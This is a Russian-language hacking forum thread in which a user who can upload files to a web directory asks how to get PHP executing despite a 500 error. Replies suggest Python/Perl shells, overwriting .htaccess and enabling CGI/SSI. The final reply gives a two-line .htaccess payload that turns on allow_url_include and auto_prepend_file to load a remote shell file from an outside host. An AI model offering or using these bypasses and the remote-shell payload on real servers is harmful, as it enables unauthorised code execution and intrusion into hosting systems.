Старый 13.07.2015, 00:55   #1
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
Question Ошибка 500 на директорию

Какой может быть .htaccess на папку, чтобы вызывать ошибку 500 internal server error при вызове любого php-скрипта, даже путём вызова через "AddType application/x-httpd-php .txt"? Есть возможность залить любой файл. Какие есть варианты обойти ошибку?
ewi вне форума   Ответить с цитированием
Старый 31.07.2015, 17:54   #2
young_snake
 
Регистрация: 09.06.2015
Сообщений: 7
Репутация: 0
По умолчанию

Цитата:
Сообщение от ewi Посмотреть сообщение
Какой может быть .htaccess на папку, чтобы вызывать ошибку 500 internal server error при вызове любого php-скрипта, даже путём вызова через "AddType application/x-httpd-php .txt"? Есть возможность залить любой файл. Какие есть варианты обойти ошибку?
А если воспользоваться шеллами на python/perl?
young_snake вне форума   Ответить с цитированием
Старый 31.07.2015, 23:11   #3
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Можно попробовать перезаписать .htaccess (если защита в нем, а не в конфигах апача), в случае, если нет проверки и есть соответствующие права. copy и move_uplodd_file поддерживают эту возможность.

Кстати, куда вы добавляете AddType application/x-httpd-php .txt? Не в этот ли .htaccess? В нем можно попробовать включить CGI / SSI.

Не получится - попробуйте залить php без php-кода, html файлы и посмотрите, как система отреагирует. Убедитесь (или опровергнете) то, что директорию обслуживает один и тот же сервер.
__________________
На правах рекламы.

Последний раз редактировалось NameSpace; 31.07.2015 в 23:14..
NameSpace вне форума   Ответить с цитированием
Старый 01.08.2015, 17:15   #4
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
По умолчанию

Цитата:
А если воспользоваться шеллами на python/perl?
Есть возможность залить, но не выставить права +x

Цитата:
Можно попробовать перезаписать .htaccess (если защита в нем, а не в конфигах апача), в случае, если нет проверки и есть соответствующие права. copy и move_uplodd_file поддерживают эту возможность.
Перезаписать можно, но у меня нет доступа к путям выше. Как то же можно переопределить действие htaccess, который выше или как то сбросить на дефолты? Читаю маны по апач и в упор подобного не вижу

Цитата:
Кстати, куда вы добавляете AddType application/x-httpd-php .txt? Не в этот ли .htaccess?
Нет не в этот, в новый, в папку уровнем выше.

Цитата:
В нем можно попробовать включить CGI / SSI.
Уже пробовал. SSI отключен, а права на CGI +x не могу выставить

А вобще это серв infobox. Там можно приобрести пробный тариф и протестировать конфиги. Ничего необычного там нету. Это явно корявый конфиг на мою папку.

===

Только что попробовал .php без кода - та же хрень. Html - без .htaccess нормально и всё другое нормально, кроме конфигов с php

Последний раз редактировалось ewi; 01.08.2015 в 17:32..
ewi вне форума   Ответить с цитированием
Старый 06.08.2015, 17:18   #5
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
По умолчанию

Ещё одна похожая ситуация с ошибкой 500. Как бы всё тоже самое, кроме одного отличия. Раширения, отличные от php, не срабатывают через AddType application/x-httpd-php .txt (или .jpg, .htm и т. д.)
ewi вне форума   Ответить с цитированием
Старый 06.08.2015, 23:42   #6
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Если вы изменяетеи.htaccess, можно сконцентрироваться на нем и забыть о загрузке файлов.


Код:
php_flag allow_url_include on
php_value auto_prepend_file "http://site.com/shell.txt"
Аналогично для вашей соседней темы.
__________________
На правах рекламы.

Последний раз редактировалось NameSpace; 06.08.2015 в 23:52..
NameSpace вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot